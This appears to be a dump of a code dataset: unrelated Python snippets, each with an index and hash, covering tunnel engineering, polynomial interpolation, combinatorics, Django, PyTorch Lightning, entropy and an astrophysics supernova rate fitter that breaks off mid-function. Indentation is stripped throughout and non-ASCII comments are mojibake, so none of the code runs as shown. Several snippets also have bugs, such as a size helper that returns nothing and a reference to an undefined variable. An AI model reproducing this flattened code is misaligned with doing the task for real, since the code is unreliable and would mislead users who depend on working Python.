self.spider.downloadCompanyPage()
#ๆธฌ่ฉฆ้ๅง
if __name__ == "__main__":
unittest.main(exit=False)
|
7,121 | f9cc9348d36c131aa3d34e4f78f67b008a1b565a | # coding: utf-8
"""
__author__: onur koc
"""
import numpy as np
import matplotlib.pyplot as plt
from mpldatacursor import datacursor
#optional to annotate any clicked point
# ------------
# Input values
# ------------
gamma = 23
# Specific weight of the rock mass [kN/mยณ]
H = 270
# Overburden [m]
nu = 0.3
# Poisson's ratio of the rock [-]
E = 300000
# Modulus of elasticity of the rock [kPa]
p_o = gamma * H
# In-situ stress [kPa]
D = 9
# Diameter of the tunnel [m]
c = 300
# Cohesion of the rock [kPa]
phi = 28
# Friction angle of the rock [deg]
Phi = np.deg2rad(phi)
# Convertion from degrees to radians [rad]
# --------------------------------
# Input values for support members
# --------------------------------
f_ck = 35
# Uniaxial compressive strength of the sprayed concrete [MPa]
E_c = 30000
# Young's modulus of the sprayed concrete [MPa]
nu_c = 0.2
# Poisson's ratio of the sprayed concrete [-]
t_c = 0.25
# Thickness of the sprayed concrete [m]
dis_sup = 0
# Distance of the support member to the face
# Other calculated values
p_i = np.arange(0, p_o, 100)
# Support pressure (an array from zero to insitu stress) [kPa]
sigma_cm = 2 * c * np.cos(Phi) / (1 - np.sin(Phi))
# Uniaxial strength of the rock mass [kPa]
k = (1 + np.sin(Phi)) / (1 - np.sin(Phi))
# Slope defined by the Mohr-Coulomb criterion [-]
# ----------------------------
# Analysis of tunnel behaviour
# ----------------------------
# Tunnel wall displacement
p_cr = (2 * p_o - sigma_cm) / (1 + k)
# Critical support pressure [kPa]
# Note: if the critical support pressure is smaller than the internal
# support pressure then failure does not occur
r_o = D / 2
# Radius of the tunnel [m]
u_ie = r_o * (1 + nu) / E * (p_o - p_i)
# Inward radial elastic displacement (Pi is a variable) [m]
r_p = r_o*(2*(p_o*(k-1)+sigma_cm)/(1+k)/((k-1)*p_i+sigma_cm))**(1/(k-1))
# Radius of the plastic zone [m]
u_ip = r_o*(1+nu)/E*(2*(1-nu)*(p_o-p_cr) * (r_p/r_o)**2-(1-2*nu)*(p_o-p_i))
# Inward radial plastic displacement (Pi is a variable) [m]
x = []
for i in range(len(p_i)):
if p_i[i] > p_cr:
x.append(u_ie[i])
else:
x.append(u_ip[i])
u_annot = r_o * (1+nu) / E * (p_o-p_cr)
# The abscissa of the ordinate: p_cr
# Logitudinal displacement profile
r_pm = r_o * ((2 * (p_o * (k-1) + sigma_cm)) / ((1+k) * sigma_cm))**(1/(k-1))
# Maximum plastic zone radius [m]
u_im = r_o * (1+nu)/E*(2*(1-nu)*(p_o-p_cr)*(r_pm/r_o)**2-(1-2*nu)*(p_o))
# Maximum displacement [m] - r_p = r_pm; p_i = 0
u_if = (u_im / 3) * np.exp(-0.15 * (r_pm / r_o))
# Displacement at the tunnel face (by Vlachopoulus and Diederichs) [m]
# Displacement ahead of the face
x_ = np.arange(-25, 40, 1)
# Distance from tunnel face (an array from -25m ahead and 40m behind the face)
# [m]
u_ix_a = (u_if) * np.exp(x_ / r_o)
# Tunnel wall displacement ahead of the face (x < 0) [m]
# Displacement behind the face
u_ix_b = u_im*(1-(1-u_if/u_im) * np.exp((-3*x_/r_o) / (2*r_pm/r_o)))
# Tunnel wall displacement behind the face (x > 0) [m]
x__ = []
for i in range(len(x_)):
if x_[i] < 0:
x__.append(u_ix_a[i])
else:
x__.append(u_ix_b[i])
lambda_face = u_if / u_im
# -----------------------
# Analysis of the support
# -----------------------
# Panet curve
#u_io = u_if + (u_im-u_if) * (1-(0.84*r_pm/(dis_sup + 0.84*r_pm))**2)
# Tunnel wall displacement at support installation [m]
# Vlachopoulus curve is as follows:
u_io = u_im*(1-(1-u_if/u_im) * np.exp((-3*dis_sup/r_o) / (2*r_pm/r_o)))
K_sc = E_c * (r_o**2 - (r_o-t_c)**2) / (2*(1-nu**2)*(r_o-t_c)*r_o**2)
# The stiffness of the sprayed concrete [MPa/m]
p_scmax = f_ck/2 * (1 - (r_o - t_c)**2 / r_o**2)
# The maximum sprayed concrete pressure [MPa]
u_iy = u_io + p_scmax / K_sc
# Yielding point of the sprayed concrete [m]
point_x = [u_io, u_iy, 1.3*u_iy]
point_y = [0, p_scmax, p_scmax]
# Points for the support yield line
if __name__ == "__main__":
fig, ax1 = plt.subplots(num=1, dpi=125, edgecolor='w')
ax1.plot(x, p_i/1000, lw=1.5, color='blue')
plt.title('Ground Reaction Curve')
ax1.set_ylabel('Support Pressure $P_i\,[MPa]$', fontsize=12)
ax1.set_xlabel('Tunnel Wall Displacement $u_i\,[m]$', fontsize=12)
for tl in ax1.get_yticklabels():
tl.set_color('b')
ax2 = ax1.twinx()
ax2.plot(x__, x_, lw=1.5, color='red')
ax2.set_ylabel('Distance from tunnel face $x\,[m]$', fontsize=12)
# ax2.axhline(y=0, xmin=u_if, xmax=0.045, color='black')
for tl in ax2.get_yticklabels():
tl.set_color('r')
xposition = [u_if]
yposition = [0, 5]
for xc in xposition:
ax2.axvline(x=xc, color='k', linestyle='--', lw=1.0)
for yc in yposition:
ax2.axhline(y=yc, color='k', linestyle='--', lw=1.0)
datacursor(display='multiple', draggable=True)
plt.figure(num=2, dpi=125, edgecolor='b')
plt.plot(x, p_i/1000, 'b-', lw=1.5)
plt.plot(point_x, point_y, 'r-', lw=1.5)
plt.title('Ground Reaction Curve')
plt.ylabel('Support Pressure $P_i\,[MPa]$', fontsize=12)
plt.xlabel('Tunnel Wall Displacement $u_i\,[m]$', fontsize=12)
datacursor(display='multiple', draggable=True)
plt.show()
|
7,122 | a610ccf4fe154ee12de9212a10958fda2000b425 | import numpy as np
from scipy.linalg import solve
from matplotlib import pylab as plt
def f(x):
return (np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2))
xx = np.arange(1, 15, 0.1)
yy = f(xx)
# 1 ััะตะฟะตะฝั
x = np.array([1,15])
y = f(x)
A = np.array([[1,1], [1,15]])
w = solve(A, y)
y1 = w[0] + w[1]*xx
plt.plot(xx, y1, '-', xx, yy, '-')
plt.show()
# 2 ััะตะฟะตะฝั
x = np.array([1, 8, 15])
y = f(x)
A = np.array([[1,1,1], [1,8,64], [1,15,225]])
w = solve(A, y)
y2 = w[0] + w[1]*xx + w[2]*(xx**2)
plt.plot(xx, y2, '-', xx, yy, '-')
plt.show()
# 3 ััะตะฟะตะฝั
x = np.array([1, 4, 10, 15])
y = f(x)
A = np.array([[1,1,1,1], [1,4,16,64], [1,10,100,1000], [1,15,225,225*15]])
w = solve(A, y)
y3 = w[0] + w[1]*xx + w[2]*(xx**2) + w[3]*(xx**3)
plt.plot(xx, y3, '-', xx, yy, '-')
plt.show()
print("w 0:4 : ", " ".join(map(str, np.round(w, 2)))) |
7,123 | d52b6dda7111aefb7f9a7b10ad606cda615389d9 | import time
class Solution(object):
def __init__(self):
self.n = None
self.memory = dict()
def dfs(self, bottom, energy):
# optimize for memory, save search time for duplicate results
if (bottom,energy) in self.memory:
return self.memory[(bottom,energy)]
# ending search
if energy == 1:
return [[bottom]]
results = []
for v in range(bottom, self.n):
tail_list = self.dfs(v+1, energy-1)
for result in tail_list:
results.append([bottom]+result)
self.memory[(bottom,energy)] = results
return results
def memory_search(self, n, k):
self.n = n
self.memory = dict()
results = []
for i in range(1, n+1-k+1):
combinations = self.dfs(i, k)
if combinations is not None:
results = results + combinations
return results
def dp(self, n, k):
# initialize: F[n,1]
tmp = []
pre_k_results = {}
for i in range(1,n+1):
tmp.append([i])
pre_k_results[i] = tmp.copy()
results = pre_k_results
# F[n,k] = F[n-1,k] + (item + [n] for item in F[n-1, k-1])
for col in range(2,k+1):
cur_k_results = {}
for row in range(col,n-k+col+1):
cur_results = []
# Part1: F[n-1, k]
if row > col:
cur_results = cur_results + pre_n_results
# Part2: (item + [n] for item in F[n-1, k-1])
for item in pre_k_results[row-1]:
cur_results.append(item+[row])
pre_n_results = cur_results
cur_k_results[row] = cur_results
pre_k_results = cur_k_results
results = cur_k_results
return results[n]
def combine(self, n, k):
"""
:type n: int
:type k: int
:rtype: List[List[int]]
"""
results = self.memory_search(n, k)
# results = self.dp(n, k)
return results
def main():
# n, k = 4, 1
# start = time.time()
# ret2 = Solution().dp(n, k)
# end = time.time()
# dp_time = round((end-start)*1000*1000,2)
# print(ret2, dp_time)
## time consume test
for n in range(5,10):
for k in range(2,n):
start = time.time()
ret1 = Solution().memory_search(n, k)
end = time.time()
memory_search_time = round((end-start)*1000*1000,2)
start = time.time()
ret2 = Solution().dp(n, k)
end = time.time()
dp_time = round((end-start)*1000*1000,2)
print("n={n},k={k} memory_search consume:{memory_search_time}ms, dp consume:{dp_time}ms".format(**locals()))
if __name__ == '__main__':
main() |
7,124 | 12c3fe8a3ca1e660eeb90b16eca17eddd47e5de7 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-10-28 17:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('KYusers', '0017_caprofile_regs'),
]
operations = [
migrations.AddField(
model_name='message',
name='mard_read',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='caprofile',
name='regs',
field=models.ManyToManyField(blank=True, related_name='regs', to='KYusers.KYProfile'),
),
]
|
7,125 | c9d25460022bb86c821600dfaed17baa70531c9f | from django.test import TestCase, Client
from django.contrib.auth.models import User
from blog.factories import BlogPostFactory, TagFactory
from blog.models import BlogPost
from faker import Factory
faker = Factory.create()
class ServicesTests(TestCase):
def setUp(self):
self.tag = TagFactory()
self.blog_post = BlogPostFactory()
self.client = Client()
self.user = User.objects.create_user(username=faker.name(), password='Ivoepanda')
def test_create_new_post_service_if_not_logged_user(self):
self.client.logout()
response = self.client.get('/create-new-post/')
self.assertEqual(302, response.status_code)
def test_create_new_post_service_if_logged_user(self):
self.client.login(username=self.user.username, password='Ivoepanda')
self.assertEqual(1, BlogPost.objects.get_private_posts().count())
response = self.client.post('/create-new-post/',
data={"title": faker.name(),
"content": faker.word(),
"author": self.user,
"tags": self.tag})
self.assertEqual(302, response.status_code)
self.assertEqual(2, BlogPost.objects.get_private_posts().count())
def tearDown(self):
self.client.logout()
|
7,126 | 46194829fc54c2f3e51febde572e05bcff261fb2 | # line_count.py
import sys
count = 0
for line in sys.stdin:
count += 1
# print goes to sys.stdout
print count |
7,127 | 1a710916461644a0676a3bd84926aeabb2aa3f71 | # coding: utf-8
def init_list():
print("=== init_list ===")
l = list()
print(l)
l2 = []
print(l2)
l3 = list((1, 2))
print(l3)
l4 = [1, 2]
print(l4)
def insert_append_and_extend_list():
print("=== insert_append_and_extend_list ===")
l = ['e', 'h']
l.insert(-1, 'g')
print(l)
l.insert(1, 'f')
print(l)
l.insert(0, 'd')
print(l)
l.insert(10, 'i')
print(l)
l.append('l')
print(l)
l.extend(['m', 'n'])
print(l)
l[0:0] = ['b', 'c']
print(l)
l = ['a'] + l
print(l)
def remove_pop_list():
print("=== remove_pop_list ===")
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l)
print('l.remove: {}'.format(l.remove('e'))) # ๅชๅ ้ค็ฌฌไธๆฌกๅบ็ฐ็๏ผๆฒกๆ่ฟๅ
print(l)
# l.remove('h') # ๅ ้คไธๅญๅจ็ไผๅฏผ่ด ValueError
if 'h' in l:
l.remove('h')
l.pop()
print(l)
l.pop(1)
print('l.pop: {}'.format(l.pop(1)))
print(l)
# l.pop(10) # IndexError: pop index out of range
def get_len_count_index_list():
print("=== get_len_count_index_list ===")
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
# l[10] = 'z' # IndexError: list index out of range
# print(l[10]) # IndexError: list index out of range
# print(l.get(10)) # 'list' object has no attribute 'get'
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
# print('index f: {}'.format(l.index('f'))) # ValueError: 'f' is not in list
def sort_reverse_list():
print("=== sort_reverse_list ===")
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort()) # return None
print(l)
l.sort(cmp=lambda x, y: -(cmp(x, y)))
print(l)
print(l.reverse()) # return None
print(l)
print(list(reversed(l))) # return a reversed iterator
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print("=== sort_list ===")
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print("=== list_index ===")
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print("=== list_slice ===")
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l) # ๆนๅ ls ไธไผๆนๅ l
def list_slice_with_step():
print("=== list_slice_with_step ===")
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print("=== list_comprehension ===")
# ๅ่กจๆจๅฏผๅผ
l = [i * i for i in range(3)]
print(l)
def test_insert_when_traversing():
print("=== test_insert_when_traversing ===")
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
# ไผๅไธไธๆฅ
def main():
# init_list()
# insert_append_and_extend_list()
# remove_pop_list()
# get_len_count_index_list()
# sort_reverse_list()
# sort_list()
# list_index()
list_slice()
# list_slice_with_step()
# list_comprehension()
# test_insert_when_traversing()
if __name__ == '__main__':
main()
# https://www.tutorialspoint.com/python/python_lists.htm
# https://stackoverflow.com/a/9028088/3936457
# https://stackoverflow.com/questions/8785554/how-do-i-insert-a-list-at-the-front-of-another-list
|
7,128 | 7d43b20ebee2f4cd509bbd896c9e6ae8b2c4b354 | #!/usr/bin/env python3
import torch
import torch.nn as nn
import torch.nn.functional as F
import pytorch_lightning as pl
import torchmetrics
class BaselineModule(pl.LightningModule):
def __init__(self, input_size, num_classes=4, lr=3e-4):
super().__init__()
self.backbone = nn.Sequential( # CBR-Tiny arXiv:1902.07208
nn.Conv2d(3, 64, 5),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d(3, 2),
nn.Conv2d(64, 256, 5),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.MaxPool2d(3, 2),
nn.Conv2d(256, 512, 5),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.MaxPool2d(3, 2),
nn.AdaptiveAvgPool2d((1, 1)),
)
hidden_size = self._get_hidden_size(input_size)
self.classifier = nn.Linear(hidden_size, num_classes)
self.lr = lr
self.train_acc = torchmetrics.Accuracy()
self.val_acc = torchmetrics.Accuracy()
def _get_hidden_size(self, input_size):
self.backbone(torch.randn(1, 3, input_size, input_size))
def forward(self, input_tensor):
hidden = self.backbone(input_tensor)
return self.classifier(hidden.squeeze())
def training_step(self, batch, batch_idx):
input_tensor, target = batch
logits = self(input_tensor)
loss = F.cross_entropy(logits, target)
self.train_acc(F.softmax(logits, 1), target)
self.log('train_acc', self.train_acc, on_epoch=True)
self.log('train_loss', loss, on_epoch=True)
return loss
def validation_step(self, batch, batch_idx):
input_tensor, target = batch
logits = self(input_tensor)
loss = F.cross_entropy(logits, target)
self.val_acc(F.softmax(logits, 1), target)
self.log('val_acc', self.val_acc, on_epoch=True)
self.log('val_loss', loss, on_epoch=True)
def configure_optimizers(self):
optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)
return optimizer
|
7,129 | 0b05b027e3c3147aa2b9c35a0bdc33633ba6e658 | #!/usr/bin/env python3
"""Shannon entropy and P affinities"""
import numpy as np
def HP(Di, beta):
"""
Function that calculates shannon entropy
"""
P = np.exp(-Di * beta)
sumP = np.sum(P)
Pi = P / sumP
Hi = -np.sum(Pi * np.log2(Pi))
return (Hi, Pi)
|
7,130 | bb173d8869039f8bbd3e35529cf2d99b26d2b8ff | #!/usr/bin/env python3
import argparse
from speaker.main import run
def parse_args():
parser = argparse.ArgumentParser(description='Network speaker device.')
parser.add_argument('-d', '--debug', action='store_true',
help='enable debugging messages')
parser.add_argument('--host', type=str,
help='IP address to bind network services to')
parser.add_argument('--grpc-port', type=int,
help='port for the gRPC service')
parser.add_argument('--rtsp-port', type=int,
help='port for the RTSP service')
parser.add_argument('--spotifyd-path', type=str,
help='path to a spotifyd binary')
return parser.parse_args()
if __name__ == '__main__':
run(parse_args())
|
7,131 | 27976e9f7fbe030910b3595ea1a13e0e505183e5 | #!/software/python-2.7-2014q3-el6-x86_64/bin/python
import SNANA_Reader as simread
import REAL_Reader as dataread
#import astropy.cosmology as cosmo
import traceback
import scipy
import scipy.stats as stats
import numpy as np
import matplotlib.pyplot as plt
plt.switch_backend('Agg')
#import Cosmology
import scipy.stats.mstats as mstats
import scipy.stats as stats
from scipy.interpolate import UnivariateSpline
from sys import argv
import glob
import time
import os
import gzip
import shutil
import numpy.ma as ma
import subprocess
import iminuit as iM
from iminuit import Minuit as M
from discreteChi2Func import discreteChi2Func as chi2func
import pandas as pd
class Rate_Fitter:
def __init__(self, realfilename, realName, simfilename, simName, simgenfilename, MCBeta, MCK, zminSamp=0.1, zmaxSamp=1.20 , zminFit = 0.1, zmaxFit = 1.20, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, Rate_Model = 'powerlaw', cheatType = False, cheatZ = False, cheatCCSub = False, cheatCCScale = False, cuts = None, nprint = 5, MURESCuts = None, noCCMC = False, priorRate = None, priorZEff = None, ratePriorErrUp = None, ratePriorErrDown =None, ratePriorErrAll = None, fixCCScale = False):
print "Rate_Fitter"
print "np version {0}".format(np.__version__)
self.zminSamp = zminSamp
self.zmaxSamp = zmaxSamp
self.zminFit = zminFit
self.zmaxFit = zmaxFit
self.MCBeta = MCBeta
self.MCK = MCK
self.Rate_Model = Rate_Model
self.cheatType = cheatType
self.cheatZ = cheatZ
self.cheatCCSub = cheatCCSub
self.cheatCCScale = cheatCCScale
self.cuts = cuts
self.nprint = nprint
self.MURESCuts = MURESCuts
self.priorRate = priorRate
self.priorZEff = priorZEff
self.ratePriorErrUp = ratePriorErrUp
self.ratePriorErrDown = ratePriorErrDown
self.ratePriorErrAll = ratePriorErrAll
self.fixCCScale = fixCCScale
#print "PRIORS"
#print priorRate
#print priorZEff
#print ratePriorErrUp
#print ratePriorErrDown
if self.cheatZ:
self.ztype = 'SIM_ZCMB'
else:
#self.ztype = 'zHD'
self.ztype = 'zPHOT'
self.shiftFlagData = False
self.shiftFlagSim = False
self.globalChi2Storage = []
self.globalNDataStorage = []
'''
self.globalZPhotBinStorage = []
self.globalNDataIaPhotBinStorage = []
self.globalNDataCCPhotBinStorage = []
self.globalZTrueBinStorage = []
self.globalNDataIaTrueBinStorage = []
self.globalNDataCCTrueBinStorage = []
'''
print 'a'
try:
self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
except:
try:
self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 5)
except:
self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6)
print 'b'
self.simName = simName
self.simgencat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
print 'c'
try:
#with np.load(simgenfilename+'.npz', allow_pickle = True) as data0:
# SIMGEN = data0['a']
SIMGEN = np.load(simgenfilename + '.npy', allow_pickle = True)
except:
SIMGEN = np.genfromtxt(simgenfilename, dtype=None, names = True, skip_footer=3, invalid_raise=False)
print "Compress save A"
SIMGEN.dtype.names = map(str, SIMGEN.dtype.names)
#np.savez_compressed(simgenfilename+'.npz', a = SIMGEN)
np.save(simgenfilename+'.npy', SIMGEN)
print "WHY DO YOU HATE ME WHEN I SHOW YOU NOTHING BUT LOVE"
print simgenfilename
#SIMGEN = pd.read_csv(simgenfilename, delim_whitespace=True, comment="#").to_records(index = False)
print 'd'
SIMGEN = SIMGEN[SIMGEN['GENZ'] != 'GENZ']
self.simgencat.params = {'flat':True, 'H0': simH0, 'Om0':simOmegaM, 'Ob0': simOb0, 'sigma8': simSigma8, 'ns': simNs}
#self.simgencat.cosmo = Cosmology.setCosmology('simCosmo', self.simcat.params)
self.simgencat.OrigCatalog = np.copy(SIMGEN)
self.simgencat.Catalog = np.copy(SIMGEN)
self.simgencat.Catalog = self.simgencat.Catalog[self.simgencat.Catalog['GENZ'] != 'GENZ']
self.simgencat.simname = simName
self.simgencat.NSN = self.simgencat.Catalog['GENZ'].shape[2]
print "SIMGEN NUMBER"
print self.simgencat.NSN
print "TEST2"
print self.simgencat.Catalog['GENZ'].shape[0]
print self.simgencat.Catalog['GENZ'].shape[1]
print self.simgencat.Catalog['GENZ'].shape[2]
print "SIMGENCAT FILE"
print simfilename
self.realName = realName
try:
print 'q'
self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6)
except:
#self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
try:
print 'r'
self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
except:
print 's'
self.realcat = dataread.REAL_Cat(realfilename, realName, skip_header =11 )
if self.cheatType:
print "WARNING, THE FITTER IS CHEATING AND ELIMINATED NON-IAs USING SIM INFO"
self.realcat.Catalog = self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]
self.simcat.Catalog = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]
print "Pre cut Catalog"
print self.realcat.Catalog.shape
for cut in cuts:
print 'a'
print cut
print self.realcat.Catalog.shape
self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.realcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])]
self.simcat.Catalog = self.simcat.Catalog[(self.simcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.simcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])]
print 'b'
print cut
print self.realcat.Catalog.shape
self.postCutRealCat = np.copy(self.realcat.Catalog)
self.postCutSimCat = np.copy(self.simcat.Catalog)
self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)]
self.simcat.Catalog = self.simcat.Catalog[(self.simcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.simcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)]
print 'zCut Pre MURESCut'
print np.sum((self.realcat.Catalog[self.ztype].astype(float) > self.zminFit) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxFit))
print 'MURESCUT'
print self.MURESCuts
print self.realcat.Catalog.shape
if not (self.MURESCuts is None):
'''
#MURES Cut format: (zmin, zmax, neg Cut, pos Cut)
for mc in self.MURESCuts:
realCond = (self.realcat.Catalog[self.ztype] < mc[0]) | (self.realcat.Catalog[self.ztype] > mc[1])| ((self.realcat.Catalog['MURES'] > mc[2])& (self.realcat.Catalog['MURES'] < mc[3]))
simCond = (self.simcat.Catalog[self.ztype] < mc[0]) | (self.simcat.Catalog[self.ztype] > mc[1])| ((self.simcat.Catalog['MURES'] > mc[2])& (self.simcat.Catalog['MURES'] < mc[3]))
self.realcat.Catalog = self.realcat.Catalog[realCond]
self.simcat.Catalog = self.simcat.Catalog[simCond]
'''
self.realcat.Catalog = self.realcat.Catalog[ np.abs( self.realcat.Catalog['MURES'] * 1.0 / self.realcat.Catalog['MUERR'] ) < MURESCuts]
self.simcat.Catalog = self.simcat.Catalog[ np.abs( self.simcat.Catalog['MURES'] * 1.0 / self.simcat.Catalog['MUERR'] ) < MURESCuts]
print "PostMURESCut Shape"
print self.realcat.Catalog.shape
print 'zCut Post MURESCut'
print np.sum((self.realcat.Catalog[self.ztype].astype(float) > self.zminFit) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxFit))
print "Post cut Catalog"
print self.realcat.Catalog.shape
if noCCMC:
self.simgencat.Catalog = self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'] == 1]
self.simcat.Catalog = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]
def newData(self, realfilename, realName, simInd =100):
self.realName = realName
self.shiftFlagData = False
try:
self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)
except:
self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6 )
if self.cheatType:
print "WARNING, THE FITTER IS CHEATING AND ELIMINATED NON-IAs USING SIM INFO"
self.realcat.Catalog = self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]
if simInd < self.nprint:
print 'N precuts'
print self.realcat.Catalog['FITPROB'].shape
print "Pre cut Catalog"
print self.realcat.Catalog.shape
for cut in cuts:
self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.realcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])]
self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)]
print "Post cut Catalog"
print self.realcat.Catalog.shape
self.postCutRealCat = np.copy(self.realcat.Catalog)
print 'MURESCUT'
print self.MURESCuts
print self.realcat.Catalog.shape
if not (self.MURESCuts is None):
#MURES Cut format: (zmin, zmax, neg Cut, pos Cut)
'''
for mc in self.MURESCuts:
realCond = (self.realcat.Catalog[self.ztype] < mc[0]) | (self.realcat.Catalog[self.ztype] > mc[1])| ((self.realcat.Catalog['MURES'] > mc[2])& (self.realcat.Catalog['MURES'] < mc[3]))
self.realcat.Catalog = self.realcat.Catalog[realCond]
'''
self.realcat.Catalog = self.realcat.Catalog[np.abs(self.realcat.Catalog['MURES']*1.0/self.realcat.Catalog['MUERR']) < MURESCuts]
print "PostMURESCut Shape"
print self.realcat.Catalog.shape
if simInd < self.nprint:
print "Minimum Fitprob"
print np.min(self.realcat.Catalog['FITPROB'])
print 'N postcuts'
print self.realcat.Catalog['FITPROB'].shape
def zSystematic(self, binList = None, nbins = None):
assert(0)
if nbins is None:
try:
self.nbins = len(binList) - 1
self.binList = binList
except:
self.nbins = binList.shape[0] - 1
self.binList = binList
else:
binList = np.linspace(self.zmin, self.zmax, nbins+1)
self.nbins = nbins
self.binList = binList
if self.shiftFlagData:
print "DONT DOUBLE SHIFT"
return 0
if not self.shiftFlagSim:
oldsimz = self.simcat.Catalog['zPHOT']
oldsimtruez = self.simcat.Catalog['SIM_ZCMB']
stat, bins, binnum = stats.binned_statistic(oldsimz, oldsimz - oldsimtruez, bins = self.binList, statistic = 'mean')
self.zBiasShifts = stat
newsimz = oldsimz - stat[binnum]
assert(np.sum(np.abs(newsimz - oldsimz)) > 0)
assert((oldzshape - np.arange(0, oldz.shape[0]).shape[0])< 1)
self.shiftFlagSim = True
oldz = self.realcat.Catalog['zPHOT']
_,_, binnum = stats.binned_statistic(oldz, oldz , bins = self.binList, statistic = 'mean')
newz = oldz - self.zBiasShifts[binnum]
oldzshape = oldz.shape[0]
self.realcat.Catalog['zPHOT'].put(np.arange(0, oldz.shape[0]), newz)
assert(np.sum(np.abs(newz - oldz)) > 0)
assert((oldzshape - np.arange(0, oldz.shape[0]).shape[0])< 1)
self.simFlagData = True
def effCalc(self, fracContamCut = 0.0, nbinsSamp = None, nbinsFit = None, binListSamp = None, binListFit = None, simInd =100):
#### Do we want SNIas or all SN for efficiency?
import matplotlib as mpl
if nbinsSamp is None:
try:
self.nbinsSamp = len(binListSamp) - 1
self.binListSamp = binListSamp
except:
self.nbinsSamp = binListSamp.shape[0] - 1
self.binListSamp = binListSamp
else:
binListSamp = np.linspace(self.zminSamp, self.zmaxSamp, nbinsSamp+1)
self.nbinsSamp = nbinsSamp
self.binListSamp = binListSamp
if nbinsFit is None:
try:
self.nbinsFit = len(binListFit) - 1
self.binListFit = binListFit
except:
self.nbinsFit = binListFit.shape[0] - 1
self.binListFit = binListFit
else:
binListFit = np.linspace(self.zminFit, self.zmaxFit, nbinsFit+1)
self.nbinsFit = nbinsFit
self.binListFit = binListFit
self.typeString = ''
#if self.cheatZ:
# self.ztype = 'SIM_ZCMB'
#else:
# self.ztype = 'zPHOT'
'''
if (fracContamCut > 0.000000001) & (fracContamCut < 1.0):
print " Cutting based on Frac Contam"
histTot, binsX, binsY = np.histogram2d(self.simcat.Catalog[ztype], self.simcat.Catalog['MURES'], bins = nbins)
